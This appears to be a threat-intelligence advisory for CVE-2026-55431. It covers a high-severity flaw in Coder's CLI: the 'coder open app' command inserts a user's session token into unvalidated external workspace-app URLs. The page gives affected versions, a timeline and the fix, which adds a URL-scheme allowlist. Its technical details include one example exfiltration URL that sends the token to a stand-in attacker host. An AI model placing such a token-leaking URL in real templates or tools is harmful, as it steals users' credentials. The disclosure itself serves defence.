Junglewise Threat Intelligence

CVE-2026-55431: Coder session token exfiltration in CLI via external app URLs

CVE-2026-55431 · Severity: high · CVSS 7.7 · Published 2026-07-08

Technologies: github.com/coder/coder/v2 (Go), Coder, github.com/coder/coder (Go). Vendors: Go, Coder.

Executive brief

Coder is a platform used by organizations to manage remote development environments. A security flaw in the Coder command-line tool could allow a malicious workspace template author to steal a user's session token. If a user opens a specially crafted application link within a compromised workspace, their login credentials could be sent to an attacker, potentially leading to unauthorized account access.

Technical details

A vulnerability exists in the Coder CLI's 'coder open app' command due to insufficient validation of external workspace-app URLs. The CLI automatically replaces the '$SESSION_TOKEN' placeholder with the user's actual session token before passing the URL to the operating system's default handler. Because the CLI fails to validate the URL scheme or host, a malicious template author can define an external app URL pointing to an attacker-controlled server (e.g., https://attacker.com/?t=$SESSION_TOKEN). If a victim executes the command against such a workspace, their session token is exfiltrated. The fix introduces a URL-scheme allowlist and restricts token substitution to trusted destinations.

Affected products

  • Coder Coder < 2.29.17, >= 2.30.0 < 2.32.7, >= 2.33.0 < 2.33.8, >= 2.34.0 < 2.34.2

Timeline

  • 2026-06-11: patched: Fix merged into main branch
  • 2026-07-08: disclosed: CVE published

References

Related threats